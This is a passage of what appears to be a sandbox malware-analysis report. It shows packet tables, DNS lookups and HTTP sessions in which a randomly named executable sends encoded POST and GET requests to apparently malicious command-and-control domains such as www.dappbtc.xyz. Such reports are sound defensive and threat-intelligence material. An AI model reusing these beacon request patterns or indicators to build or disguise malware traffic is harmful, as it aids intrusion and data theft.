                                            Mar 2, 2025 12:03:54.278125048 CET4998280192.168.2.513.248.169.48
                                            Mar 2, 2025 12:03:54.283255100 CET804998213.248.169.48192.168.2.5
                                            Mar 2, 2025 12:03:59.305031061 CET4998380192.168.2.53.33.130.190
                                            Mar 2, 2025 12:03:59.310236931 CET80499833.33.130.190192.168.2.5
                                            Mar 2, 2025 12:03:59.311393976 CET4998380192.168.2.53.33.130.190
                                            Mar 2, 2025 12:03:59.323573112 CET4998380192.168.2.53.33.130.190
                                            Mar 2, 2025 12:03:59.328691006 CET80499833.33.130.190192.168.2.5
                                            Mar 2, 2025 12:03:59.785804987 CET80499833.33.130.190192.168.2.5
                                            Mar 2, 2025 12:03:59.785842896 CET80499833.33.130.190192.168.2.5
                                            Mar 2, 2025 12:03:59.785974979 CET4998380192.168.2.53.33.130.190
                                            Mar 2, 2025 12:04:00.832459927 CET4998380192.168.2.53.33.130.190
                                            Mar 2, 2025 12:04:01.850553036 CET4998480192.168.2.53.33.130.190
                                            Mar 2, 2025 12:04:01.855916977 CET80499843.33.130.190192.168.2.5
                                            Mar 2, 2025 12:04:01.856039047 CET4998480192.168.2.53.33.130.190
                                            Mar 2, 2025 12:04:01.869292974 CET4998480192.168.2.53.33.130.190
                                            Mar 2, 2025 12:04:01.874947071 CET80499843.33.130.190192.168.2.5
                                            Mar 2, 2025 12:04:02.423090935 CET80499843.33.130.190192.168.2.5
                                            Mar 2, 2025 12:04:02.423429966 CET80499843.33.130.190192.168.2.5
                                            Mar 2, 2025 12:04:02.423508883 CET4998480192.168.2.53.33.130.190
                                            Mar 2, 2025 12:04:03.379461050 CET4998480192.168.2.53.33.130.190
                                            Mar 2, 2025 12:04:04.399040937 CET4998580192.168.2.53.33.130.190
                                            Mar 2, 2025 12:04:04.404572964 CET80499853.33.130.190192.168.2.5
                                            Mar 2, 2025 12:04:04.404740095 CET4998580192.168.2.53.33.130.190
                                            Mar 2, 2025 12:04:04.417736053 CET4998580192.168.2.53.33.130.190
                                            Mar 2, 2025 12:04:04.422930956 CET80499853.33.130.190192.168.2.5
                                            Mar 2, 2025 12:04:04.423113108 CET80499853.33.130.190192.168.2.5
                                            Mar 2, 2025 12:04:04.932231903 CET80499853.33.130.190192.168.2.5
                                            Mar 2, 2025 12:04:04.932352066 CET80499853.33.130.190192.168.2.5
                                            Mar 2, 2025 12:04:04.932495117 CET4998580192.168.2.53.33.130.190
                                            Mar 2, 2025 12:04:05.926284075 CET4998580192.168.2.53.33.130.190
                                            Mar 2, 2025 12:04:06.944648027 CET4998680192.168.2.53.33.130.190
                                            Mar 2, 2025 12:04:06.950117111 CET80499863.33.130.190192.168.2.5
                                            Mar 2, 2025 12:04:06.950283051 CET4998680192.168.2.53.33.130.190
                                            Mar 2, 2025 12:04:06.961466074 CET4998680192.168.2.53.33.130.190
                                            Mar 2, 2025 12:04:06.966594934 CET80499863.33.130.190192.168.2.5
                                            Mar 2, 2025 12:04:07.466578960 CET80499863.33.130.190192.168.2.5
                                            Mar 2, 2025 12:04:07.466665983 CET80499863.33.130.190192.168.2.5
                                            Mar 2, 2025 12:04:07.466799021 CET4998680192.168.2.53.33.130.190
                                            Mar 2, 2025 12:04:07.469504118 CET4998680192.168.2.53.33.130.190
                                            Mar 2, 2025 12:04:07.474634886 CET80499863.33.130.190192.168.2.5
                                            Mar 2, 2025 12:04:12.492784023 CET4998780192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:12.498411894 CET8049987104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:12.498693943 CET4998780192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:12.510289907 CET4998780192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:12.515661955 CET8049987104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:13.384954929 CET8049987104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:13.385030031 CET8049987104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:13.385122061 CET4998780192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:13.385428905 CET8049987104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:13.385493994 CET4998780192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:14.020347118 CET4998780192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:15.040004969 CET4998880192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:15.045329094 CET8049988104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:15.045434952 CET4998880192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:15.062973976 CET4998880192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:15.068305969 CET8049988104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:16.022646904 CET8049988104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:16.022728920 CET8049988104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:16.022797108 CET4998880192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:16.023632050 CET8049988104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:16.023689985 CET4998880192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:16.566953897 CET4998880192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:17.624325037 CET4998980192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:17.629517078 CET8049989104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:17.629611015 CET4998980192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:17.641733885 CET4998980192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:17.646816015 CET8049989104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:17.647089005 CET8049989104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:18.575109005 CET8049989104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:18.575222015 CET8049989104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:18.575428963 CET4998980192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:18.575743914 CET8049989104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:18.575937986 CET4998980192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:19.145051956 CET4998980192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:20.163125992 CET4999080192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:20.170087099 CET8049990104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:20.170185089 CET4999080192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:20.178172112 CET4999080192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:20.183993101 CET8049990104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:21.067070007 CET8049990104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:21.067153931 CET8049990104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:21.067177057 CET8049990104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:21.067198992 CET8049990104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:21.067277908 CET4999080192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:21.067277908 CET4999080192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:21.068099976 CET8049990104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:21.068156958 CET8049990104.21.80.1192.168.2.5
                                            Mar 2, 2025 12:04:21.068219900 CET4999080192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:21.072232008 CET4999080192.168.2.5104.21.80.1
                                            Mar 2, 2025 12:04:21.077286005 CET8049990104.21.80.1192.168.2.5

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Mar 2, 2025 12:03:29.530525923 CET5494553192.168.2.51.1.1.1
                                            Mar 2, 2025 12:03:29.553684950 CET53549451.1.1.1192.168.2.5
                                            Mar 2, 2025 12:03:45.070591927 CET5321153192.168.2.51.1.1.1
                                            Mar 2, 2025 12:03:45.082230091 CET53532111.1.1.1192.168.2.5
                                            Mar 2, 2025 12:03:59.288482904 CET6216453192.168.2.51.1.1.1
                                            Mar 2, 2025 12:03:59.301740885 CET53621641.1.1.1192.168.2.5
                                            Mar 2, 2025 12:04:12.476407051 CET5603253192.168.2.51.1.1.1
                                            Mar 2, 2025 12:04:12.489371061 CET53560321.1.1.1192.168.2.5

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Mar 2, 2025 12:03:29.530525923 CET192.168.2.51.1.1.10x6b84Standard query (0)www.orbt.zoneA (IP address)IN (0x0001)false
                                            Mar 2, 2025 12:03:45.070591927 CET192.168.2.51.1.1.10x4b60Standard query (0)www.dappbtc.xyzA (IP address)IN (0x0001)false
                                            Mar 2, 2025 12:03:59.288482904 CET192.168.2.51.1.1.10xe3f2Standard query (0)www.thefounder.ceoA (IP address)IN (0x0001)false
                                            Mar 2, 2025 12:04:12.476407051 CET192.168.2.51.1.1.10xff53Standard query (0)www.dd87558.vipA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Mar 2, 2025 12:03:29.553684950 CET1.1.1.1192.168.2.50x6b84No error (0)www.orbt.zoneorbt.zoneCNAME (Canonical name)IN (0x0001)false
                                            Mar 2, 2025 12:03:29.553684950 CET1.1.1.1192.168.2.50x6b84No error (0)orbt.zone3.33.130.190A (IP address)IN (0x0001)false
                                            Mar 2, 2025 12:03:29.553684950 CET1.1.1.1192.168.2.50x6b84No error (0)orbt.zone15.197.148.33A (IP address)IN (0x0001)false
                                            Mar 2, 2025 12:03:45.082230091 CET1.1.1.1192.168.2.50x4b60No error (0)www.dappbtc.xyz13.248.169.48A (IP address)IN (0x0001)false
                                            Mar 2, 2025 12:03:45.082230091 CET1.1.1.1192.168.2.50x4b60No error (0)www.dappbtc.xyz76.223.54.146A (IP address)IN (0x0001)false
                                            Mar 2, 2025 12:03:59.301740885 CET1.1.1.1192.168.2.50xe3f2No error (0)www.thefounder.ceothefounder.ceoCNAME (Canonical name)IN (0x0001)false
                                            Mar 2, 2025 12:03:59.301740885 CET1.1.1.1192.168.2.50xe3f2No error (0)thefounder.ceo3.33.130.190A (IP address)IN (0x0001)false
                                            Mar 2, 2025 12:03:59.301740885 CET1.1.1.1192.168.2.50xe3f2No error (0)thefounder.ceo15.197.148.33A (IP address)IN (0x0001)false
                                            Mar 2, 2025 12:04:12.489371061 CET1.1.1.1192.168.2.50xff53No error (0)www.dd87558.vip104.21.80.1A (IP address)IN (0x0001)false
                                            Mar 2, 2025 12:04:12.489371061 CET1.1.1.1192.168.2.50xff53No error (0)www.dd87558.vip104.21.32.1A (IP address)IN (0x0001)false
                                            Mar 2, 2025 12:04:12.489371061 CET1.1.1.1192.168.2.50xff53No error (0)www.dd87558.vip104.21.48.1A (IP address)IN (0x0001)false
                                            Mar 2, 2025 12:04:12.489371061 CET1.1.1.1192.168.2.50xff53No error (0)www.dd87558.vip104.21.96.1A (IP address)IN (0x0001)false
                                            Mar 2, 2025 12:04:12.489371061 CET1.1.1.1192.168.2.50xff53No error (0)www.dd87558.vip104.21.112.1A (IP address)IN (0x0001)false
                                            Mar 2, 2025 12:04:12.489371061 CET1.1.1.1192.168.2.50xff53No error (0)www.dd87558.vip104.21.64.1A (IP address)IN (0x0001)false
                                            Mar 2, 2025 12:04:12.489371061 CET1.1.1.1192.168.2.50xff53No error (0)www.dd87558.vip104.21.16.1A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • www.orbt.zone
                                            • www.dappbtc.xyz
                                            • www.thefounder.ceo
                                            • www.dd87558.vip

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.5499773.33.130.190804428C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exe
                                            TimestampBytes transferredDirectionData
                                            Mar 2, 2025 12:03:29.574640036 CET578OUTGET /trb7/?Fz_=qHEtbb90tLjTN0x0&505xOj4=Xdn7dmByJ0SORf47t42bAx5WV1eyCacQKmkFCNQ6K2u6nUFId+HMmpMPHimZ5g5DxJKoilAcLigxWiGxpbKVMyeIdZnhYq/apiGHlDjJn/QLlWHX8msAwn+Pvjx8OaMCFw== HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.orbt.zone
                                            Connection: close
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
                                            Mar 2, 2025 12:03:30.025393009 CET397INHTTP/1.1 200 OK
                                            content-type: text/html
                                            date: Sun, 02 Mar 2025 11:03:29 GMT
                                            content-length: 276
                                            connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 7a 5f 3d 71 48 45 74 62 62 39 30 74 4c 6a 54 4e 30 78 30 26 35 30 35 78 4f 6a 34 3d 58 64 6e 37 64 6d 42 79 4a 30 53 4f 52 66 34 37 74 34 32 62 41 78 35 57 56 31 65 79 43 61 63 51 4b 6d 6b 46 43 4e 51 36 4b 32 75 36 6e 55 46 49 64 2b 48 4d 6d 70 4d 50 48 69 6d 5a 35 67 35 44 78 4a 4b 6f 69 6c 41 63 4c 69 67 78 57 69 47 78 70 62 4b 56 4d 79 65 49 64 5a 6e 68 59 71 2f 61 70 69 47 48 6c 44 6a 4a 6e 2f 51 4c 6c 57 48 58 38 6d 73 41 77 6e 2b 50 76 6a 78 38 4f 61 4d 43 46 77 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Fz_=qHEtbb90tLjTN0x0&505xOj4=Xdn7dmByJ0SORf47t42bAx5WV1eyCacQKmkFCNQ6K2u6nUFId+HMmpMPHimZ5g5DxJKoilAcLigxWiGxpbKVMyeIdZnhYq/apiGHlDjJn/QLlWHX8msAwn+Pvjx8OaMCFw=="}</script></head></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.54997913.248.169.48804428C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exe
                                            TimestampBytes transferredDirectionData
                                            Mar 2, 2025 12:03:45.108382940 CET830OUTPOST /oiz0/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.dappbtc.xyz
                                            Cache-Control: max-age=0
                                            Content-Length: 208
                                            Content-Type: application/x-www-form-urlencoded
                                            Connection: close
                                            Origin: http://www.dappbtc.xyz
                                            Referer: http://www.dappbtc.xyz/oiz0/
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
                                            Data Raw: 35 30 35 78 4f 6a 34 3d 77 74 52 57 52 49 52 52 35 79 35 49 62 61 50 77 37 2f 31 69 2f 54 42 5a 71 55 36 4f 6c 30 44 47 55 52 78 72 73 38 52 33 68 57 2b 48 62 4e 6c 5a 55 62 4f 33 6b 62 43 49 48 63 42 58 39 59 6e 48 52 4f 61 64 76 4a 4c 37 77 4c 77 76 2f 73 42 46 75 4f 61 75 42 6c 76 4b 6f 70 52 51 69 38 30 6c 76 54 69 77 39 46 61 6e 4c 69 4a 4d 51 32 72 6d 58 32 4a 42 39 78 6d 58 6b 57 53 68 67 33 51 6f 42 47 2b 68 54 38 47 71 70 36 4a 6e 6b 35 75 51 4b 67 70 7a 46 45 6f 42 6b 36 4b 6a 48 75 75 61 52 48 36 71 75 32 4f 45 76 2b 67 68 54 44 77 6c 79 78 36 63 35 72 4a 64 6d 79 76 43 4d 76 4d 53 34 32 4b 33 6d 70 4d 3d
                                            Data Ascii: 505xOj4=wtRWRIRR5y5IbaPw7/1i/TBZqU6Ol0DGURxrs8R3hW+HbNlZUbO3kbCIHcBX9YnHROadvJL7wLwv/sBFuOauBlvKopRQi80lvTiw9FanLiJMQ2rmX2JB9xmXkWShg3QoBG+hT8Gqp6Jnk5uQKgpzFEoBk6KjHuuaRH6qu2OEv+ghTDwlyx6c5rJdmyvCMvMS42K3mpM=
                                            Mar 2, 2025 12:03:45.575951099 CET73INHTTP/1.1 405 Method Not Allowed
                                            content-length: 0
                                            connection: close


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.54998013.248.169.48804428C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exe
                                            TimestampBytes transferredDirectionData
                                            Mar 2, 2025 12:03:47.650093079 CET850OUTPOST /oiz0/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.dappbtc.xyz
                                            Cache-Control: max-age=0
                                            Content-Length: 228
                                            Content-Type: application/x-www-form-urlencoded
                                            Connection: close
                                            Origin: http://www.dappbtc.xyz
                                            Referer: http://www.dappbtc.xyz/oiz0/
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
                                            Data Raw: 35 30 35 78 4f 6a 34 3d 77 74 52 57 52 49 52 52 35 79 35 49 61 36 2f 77 35 63 4e 69 33 54 42 59 76 55 36 4f 72 55 44 43 55 52 4e 72 73 34 4a 6e 68 6a 4f 48 62 70 31 5a 56 61 4f 33 6e 62 43 49 4a 38 42 65 77 34 6e 4d 52 4f 47 6a 76 4c 66 37 77 4c 6b 76 2f 6f 46 46 75 35 75 70 43 56 76 4d 75 70 52 6f 39 73 30 6c 76 54 69 77 39 45 36 65 4c 6d 6c 4d 51 47 62 6d 57 55 68 47 6a 42 6d 59 79 6d 53 68 79 48 51 73 42 47 2f 4f 54 2b 2b 41 70 34 42 6e 6b 38 4b 51 4b 78 70 77 4c 45 6f 48 71 61 4c 64 4b 50 33 58 62 30 47 34 6d 67 2f 6e 32 74 68 56 57 31 42 50 6f 54 79 30 71 4c 6c 6c 32 68 6e 31 64 66 74 37 69 56 61 48 34 2b 59 4e 56 74 6e 52 64 35 76 35 6b 74 42 63 51 58 46 67 6d 6e 31 53
                                            Data Ascii: 505xOj4=wtRWRIRR5y5Ia6/w5cNi3TBYvU6OrUDCURNrs4JnhjOHbp1ZVaO3nbCIJ8Bew4nMROGjvLf7wLkv/oFFu5upCVvMupRo9s0lvTiw9E6eLmlMQGbmWUhGjBmYymShyHQsBG/OT++Ap4Bnk8KQKxpwLEoHqaLdKP3Xb0G4mg/n2thVW1BPoTy0qLll2hn1dft7iVaH4+YNVtnRd5v5ktBcQXFgmn1S
                                            Mar 2, 2025 12:03:48.095664024 CET73INHTTP/1.1 405 Method Not Allowed
                                            content-length: 0
                                            connection: close


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.54998113.248.169.48804428C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exe
                                            TimestampBytes transferredDirectionData
                                            Mar 2, 2025 12:03:50.198302984 CET1867OUTPOST /oiz0/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.dappbtc.xyz
                                            Cache-Control: max-age=0
                                            Content-Length: 1244
                                            Content-Type: application/x-www-form-urlencoded
                                            Connection: close
                                            Origin: http://www.dappbtc.xyz
                                            Referer: http://www.dappbtc.xyz/oiz0/
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
                                            Data Raw: 35 30 35 78 4f 6a 34 3d 77 74 52 57 52 49 52 52 35 79 35 49 61 36 2f 77 35 63 4e 69 33 54 42 59 76 55 36 4f 72 55 44 43 55 52 4e 72 73 34 4a 6e 68 69 61 48 59 65 64 5a 55 39 61 33 6d 62 43 49 58 73 42 62 77 34 6e 64 52 4f 66 6b 76 4c 43 5a 77 49 63 76 2f 4c 64 46 6f 4c 47 70 56 6c 76 4d 73 70 52 54 69 38 30 77 76 51 61 30 39 45 4b 65 4c 6d 6c 4d 51 41 66 6d 41 32 4a 47 68 42 6d 58 6b 57 53 39 67 33 51 55 42 41 57 35 54 2b 36 36 6f 4a 68 6e 6e 61 71 51 49 44 42 77 48 45 6f 46 6e 36 4c 56 4b 50 4b 58 62 30 61 30 6d 6b 33 4e 32 74 5a 56 57 30 38 37 31 53 4f 65 32 71 70 42 32 43 71 54 43 4b 6b 61 38 45 32 42 39 50 30 32 64 2b 50 52 63 4a 50 2b 69 4f 70 58 42 6a 59 31 69 53 34 6a 4f 39 50 66 6f 6a 44 38 69 6d 45 56 51 49 36 6f 4d 66 66 49 6c 31 44 5a 35 6f 66 48 2f 4d 70 7a 75 56 63 74 71 6f 6c 30 37 44 57 39 62 5a 49 4c 44 31 35 56 48 31 43 71 6a 6e 67 4f 78 63 6d 75 4f 51 33 42 31 46 45 31 6c 6b 4a 2f 51 44 66 52 6f 4e 44 65 50 6b 49 2f 49 67 71 33 67 75 64 78 41 31 52 65 61 69 6f 31 64 32 69 71 34 75 [TRUNCATED]
                                            Data Ascii: 505xOj4=wtRWRIRR5y5Ia6/w5cNi3TBYvU6OrUDCURNrs4JnhiaHYedZU9a3mbCIXsBbw4ndROfkvLCZwIcv/LdFoLGpVlvMspRTi80wvQa09EKeLmlMQAfmA2JGhBmXkWS9g3QUBAW5T+66oJhnnaqQIDBwHEoFn6LVKPKXb0a0mk3N2tZVW0871SOe2qpB2CqTCKka8E2B9P02d+PRcJP+iOpXBjY1iS4jO9PfojD8imEVQI6oMffIl1DZ5ofH/MpzuVctqol07DW9bZILD15VH1CqjngOxcmuOQ3B1FE1lkJ/QDfRoNDePkI/Igq3gudxA1Reaio1d2iq4uPN66MmVakRda1FAFykoSykvtOqAWBn/dEuBHfjyj6FEgfVtDLhGavTUJZvqnvLvapgPBXO8zYY4fUBmDVgMvyoPqDlEXJSAOSJtcI4VH3kXF1t4Nw2a0/O1PMComxYOa+d/YebKrwYIbg03jWy4bKhbGbIVc94biGdT9XsoZSyS0xqWNaMHY3xz+tV384Dbc9EJA7t9Vm9BHqQx1QAmPLhKtUjlYNXZnF3QpSdEdfTYdsfJgxHLuvBc6uXQ/4HNtY06p1pXSxu5igNl6P0QouR+J0wpAnSp9Fb8AxxT9jFg21+WqMAm0iVY1W6b/MOkzTFqi+F5QIH5Wtxi3nV9NRGlZacP21uWIPKcQF5otHFkdULn4+OMhsG+WJqj/zf32p/449mjs85SiDqhQhcB0fAJGt/E0T3qrTfBTqs/+7xOohfmbIUQD+wT+o+esZPspSQq+taDHMYLZoH1Q47aSityrfZCOTe0t9gA2bDcRlfKxDKNO3/nZ+LCIjwUWUmiEkVsYxlkEpyF7eihu9FV0AWpvcApv2AiKvFwsSyddgETqcL+iiIx3aNnmo1cxxpKWKfr+c00oxK8radFLYCCWH8aKxa2+RYZBQ2X8D3MzI/B8k/4jVTYvCgivQiGMrtZYPpSbFpOMIz0G5TgYDnM2DTCcsPVLJmplmz [TRUNCATED]
                                            Mar 2, 2025 12:03:50.667792082 CET73INHTTP/1.1 405 Method Not Allowed
                                            content-length: 0
                                            connection: close


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.54998213.248.169.48804428C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exe
                                            TimestampBytes transferredDirectionData
                                            Mar 2, 2025 12:03:52.742511034 CET580OUTGET /oiz0/?505xOj4=9v52S88T1gt5Tc2r5fMP4iQJv1OwsGvqWAUGmfB8mEPwD/VFfrObpLTzAs1Uk7jQTseEv8LuraBd/6FxjeW4VhjFroZ6+sME+SOo2g6WIidsbUGcBERugzeokGvmwW9kTw==&Fz_=qHEtbb90tLjTN0x0 HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.dappbtc.xyz
                                            Connection: close
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
                                            Mar 2, 2025 12:03:54.274168015 CET397INHTTP/1.1 200 OK
                                            content-type: text/html
                                            date: Sun, 02 Mar 2025 11:03:54 GMT
                                            content-length: 276
                                            connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 35 30 35 78 4f 6a 34 3d 39 76 35 32 53 38 38 54 31 67 74 35 54 63 32 72 35 66 4d 50 34 69 51 4a 76 31 4f 77 73 47 76 71 57 41 55 47 6d 66 42 38 6d 45 50 77 44 2f 56 46 66 72 4f 62 70 4c 54 7a 41 73 31 55 6b 37 6a 51 54 73 65 45 76 38 4c 75 72 61 42 64 2f 36 46 78 6a 65 57 34 56 68 6a 46 72 6f 5a 36 2b 73 4d 45 2b 53 4f 6f 32 67 36 57 49 69 64 73 62 55 47 63 42 45 52 75 67 7a 65 6f 6b 47 76 6d 77 57 39 6b 54 77 3d 3d 26 46 7a 5f 3d 71 48 45 74 62 62 39 30 74 4c 6a 54 4e 30 78 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?505xOj4=9v52S88T1gt5Tc2r5fMP4iQJv1OwsGvqWAUGmfB8mEPwD/VFfrObpLTzAs1Uk7jQTseEv8LuraBd/6FxjeW4VhjFroZ6+sME+SOo2g6WIidsbUGcBERugzeokGvmwW9kTw==&Fz_=qHEtbb90tLjTN0x0"}</script></head></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.5499833.33.130.190804428C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exe
                                            TimestampBytes transferredDirectionData
                                            Mar 2, 2025 12:03:59.323573112 CET839OUTPOST /je5x/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.thefounder.ceo
                                            Cache-Control: max-age=0
                                            Content-Length: 208
                                            Content-Type: application/x-www-form-urlencoded
                                            Connection: close
                                            Origin: http://www.thefounder.ceo
                                            Referer: http://www.thefounder.ceo/je5x/
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
